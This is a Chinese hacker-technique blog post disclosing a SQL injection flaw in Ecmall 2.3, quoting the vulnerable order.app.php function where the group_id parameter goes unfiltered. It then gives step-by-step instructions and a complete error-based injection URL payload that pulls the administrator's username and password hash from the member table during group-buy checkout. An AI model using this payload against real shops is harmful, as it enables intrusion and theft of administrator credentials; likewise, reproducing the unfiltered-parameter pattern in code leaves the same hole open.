记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Ecmall 2.3版本存SQL注入

2014-02-12 14:20
漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤
 
 

function _clear_goods($order_id)

{

switch ($_GET['goods'])

{

case 'groupbuy':

/* 团购的商品 */

$model_groupbuy =& m('groupbuy');

$model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array(

'order_id' => $order_id,

));//这里没有对$_GET['group_id']进行过滤

break;



}

}

 

 
首先参加一个团购活动,当团购活动结束后,点击购买
 
点下一步时,更改当前网址如:
 
 
http://0day5.com/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23

然后点击"下单完成并支付"将会出现注入信息,如管理员账号密码等
知识来源: www.2cto.com/Article/201402/277758.html

阅读:61593 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“Ecmall 2.3版本存SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云